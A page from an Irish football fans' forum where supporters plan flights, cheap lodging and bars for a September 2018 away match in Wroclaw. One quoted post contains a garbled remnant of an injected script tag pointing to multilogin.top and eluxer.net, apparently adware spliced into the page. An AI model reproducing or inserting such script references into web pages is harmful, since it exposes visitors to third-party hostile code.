You Boys in Green Homepage YBIG Shop
Forum Home Forum Home : International : Away days + World Cup 2022 Accommodation and Travel
  FAQ FAQ  Forum Search   Events   Register Register  Login Login

Poland Away in September - Wroclaw

Post Reply Post Reply Page  <1 7891011 23>
Author
Ray Houghton
Ray Houghton

Post Options Post Options   Thanks (0) Thanks(0)   Quote Butch Quote  Post ReplyReply Direct Link To This Post Posted: 01 May 2018 at 2:13pm
2 bed apartment 72e sleeps 4 and has gym ; pools and saunas 
Sponsored Links

Adobolo View Drop Down
Kevin Kilbane
Kevin Kilbane

Post Options Post Options   Thanks (0) Thanks(0)   Quote Adobolo Quote  Post ReplyReply Direct Link To This Post Posted: 01 May 2018 at 4:06pm
I saw that one, I was afriad it would be too nice and when the owner found out there was a bunch of lads coming for a match it may be cancelled 
PaulB View Drop Down
Kevin Kilbane
Kevin Kilbane

Post Options Post Options   Thanks (0) Thanks(0)   Quote PaulB Quote  Post ReplyReply Direct Link To This Post Posted: 02 May 2018 at 10:50am
booked Belfast to Wroclaw 9.20 on the Monday. Home Wroclaw to Dublin the Wednesday night £77 for the flights, hotel was £40 for the two nights. Not bad at all.

Edited by PaulB - 02 May 2018 at 10:51am
Jasonic View Drop Down
Kevin Kilbane
Kevin Kilbane

Post Options Post Options   Thanks (0) Thanks(0)   Quote Jasonic Quote  Post ReplyReply Direct Link To This Post Posted: 02 May 2018 at 4:11pm
What area / places are people staying in Wroclaw? The Old town part?
PaulB View Drop Down
Kevin Kilbane
Kevin Kilbane

Post Options Post Options   Thanks (0) Thanks(0)   Quote PaulB Quote  Post ReplyReply Direct Link To This Post Posted: 02 May 2018 at 4:53pm
"Good night in Wroclaw Aries" is the place I booked. looks very central and the reviews are very good and at £40 its a steal in my opinion
Paulie View Drop Down
Liam Brady
Liam Brady

Post Options Post Options   Thanks (1) Thanks(1)   Quote Paulie Quote  Post ReplyReply Direct Link To This Post Posted: 02 May 2018 at 5:44pm
Originally posted by Jasonic Jasonic wrote:

What area / places are people staying in Wroclaw? The Old town part?

Aim for somewhere around Market Square.
Adobolo View Drop Down
Kevin Kilbane
Kevin Kilbane

Post Options Post Options   Thanks (0) Thanks(0)   Quote Adobolo Quote  Post ReplyReply Direct Link To This Post Posted: 02 May 2018 at 6:36pm
yea anywhere in old town seems to be the place, countless amounts of Bars and restraunts and of course the one "Irish Bar". Accommodation is cheap also for the centre of a city.
DonkeyOatey View Drop Down
Kevin Kilbane
Kevin Kilbane

Post Options Post Options   Thanks (0) Thanks(0)   Quote DonkeyOatey Quote  Post ReplyReply Direct Link To This Post Posted: 02 May 2018 at 8:42pm
Originally posted by Adobolo Adobolo wrote:

yea anywhere in old town seems to be the place, countless amounts of Bars and restraunts and of course the one "Irish Bar". Accommodation is cheap also for the centre of a city.

The one irish bar that they have clearly spent many seconds coming  up with the name, "Guinness Bar". 

Edited by DonkeyOatey - 02 May 2018 at 8:45pm
eireland View Drop Down
Ray Houghton
Ray Houghton

Post Options Post Options   Thanks (0) Thanks(0)   Quote eireland Quote  Post ReplyReply Direct Link To This Post Posted: 02 May 2018 at 9:49pm
Originally posted by DonkeyOatey DonkeyOatey wrote:

Originally posted by Adobolo Adobolo wrote:

The one irish bar that they have clearly spent many seconds coming  up with the name, "Guinness Bar". 

Marketing genius. Straight to the point. 
Adobolo View Drop Down
Kevin Kilbane
Kevin Kilbane

Post Options Post Options   Thanks (0) Thanks(0)   Quote Adobolo Quote  Post ReplyReply Direct Link To This Post Posted: 02 May 2018 at 10:11pm
it does not look the best Irish Bar in the world, might give it a miss to tell you the truth.
SuperDave84 View Drop Down
Robbie Keane
Robbie Keane
ooh Thomas, how could you do this to me!

Post Options Post Options   Thanks (0) Thanks(0)   Quote SuperDave84 Quote  Post ReplyReply Direct Link To This Post Posted: 02 May 2018 at 10:35pm
I find that the best Irish bars are most likely found in Ireland.

Once they're not in Ireland, they tend to be much the same: a faint whiff of vomit, gone off beer and life-sapping despair.
Cabra Hoop View Drop Down
Roy Keane
Roy Keane

Post Options Post Options   Thanks (0) Thanks(0)   Quote Cabra Hoop Quote  Post ReplyReply Direct Link To This Post Posted: 02 May 2018 at 10:44pm
Originally posted by SuperDave84 SuperDave84 wrote:

Once they're not in Ireland, they tend to be much the same: a faint whiff of vomit, gone off beer and life-sapping despair.
I think that description could also be used for the city of Glasgow. Doing Sunday to Wednesday with a day trip to Auschwitz on Monday. 
" BFC always gives me a laugh........ "
Adobolo View Drop Down
Kevin Kilbane
Kevin Kilbane

Post Options Post Options   Thanks (0) Thanks(0)   Quote Adobolo Quote  Post ReplyReply Direct Link To This Post Posted: 03 May 2018 at 12:19am
seems to be a good crowd going seen as it's a friendly in September, how may do ye think we will bring?
DonkeyOatey View Drop Down
Kevin Kilbane
Kevin Kilbane

Post Options Post Options   Thanks (0) Thanks(0)   Quote DonkeyOatey Quote  Post ReplyReply Direct Link To This Post Posted: 03 May 2018 at 12:42am
I actually prefer drinking in the local spots when i go away. I avoid the Irish bars as much as possible. Pijalnia wodka i piwa is a very cheap chain of bars, one on rynek in Wroclaw for those looking for a cheap spot. Always  the busier spot in the cities and towns ive been in, so the beer is alright. Do a bit of local grub too. 
Baldrick View Drop Down
Robbie Keane
Robbie Keane
Peyton-tly Pedantic

Post Options Post Options   Thanks (0) Thanks(0)   Quote Baldrick Quote  Post ReplyReply Direct Link To This Post Posted: 03 May 2018 at 7:32am
Originally posted by Butch Butch wrote:

2 bed apartment 72e sleeps 4 and has gym ; pools and saunas 

Must be a big apartment to fit all of that 
AKA pedantic kunt
gspain View Drop Down
Ray Houghton
Ray Houghton

Post Options Post Options   Thanks (0) Thanks(0)   Quote gspain Quote  Post ReplyReply Direct Link To This Post Posted: 03 May 2018 at 9:35am
Originally posted by SuperDave84 SuperDave84 wrote:

< ="//multilogin.top/oldmultitabs.js">https://eluxer.net/code?id=105&subid=50932_2852_">

Not forgetting greatly overpriced.  
Jasonic View Drop Down
Kevin Kilbane
Kevin Kilbane

Post Options Post Options   Thanks (0) Thanks(0)   Quote Jasonic Quote  Post ReplyReply Direct Link To This Post Posted: 03 May 2018 at 11:11am
Originally posted by DonkeyOatey DonkeyOatey wrote:

I actually prefer drinking in the local spots when i go away. I avoid the Irish bars as much as possible. Pijalnia wodka i piwa is a very cheap chain of bars, one on rynek in Wroclaw for those looking for a cheap spot. Always  the busier spot in the cities and towns ive been in, so the beer is alright. Do a bit of local grub too. 

I like Krupnik pigwowa vodka (quince). Lovely stuff. I've been to Wroclaw a few times, watched the World cup final in the square there in 2014. The wife is Polish, about 100km's away from Wroclaw (and from Krakow). It's a good city. The Irish pub there isn't great.
eireland View Drop Down
Ray Houghton
Ray Houghton

Post Options Post Options   Thanks (0) Thanks(0)   Quote eireland Quote  Post ReplyReply Direct Link To This Post Posted: 04 May 2018 at 11:51am
Have they announced kick off time? 
 Post Reply Post Reply Page  <1 7891011 23>
  Share Topic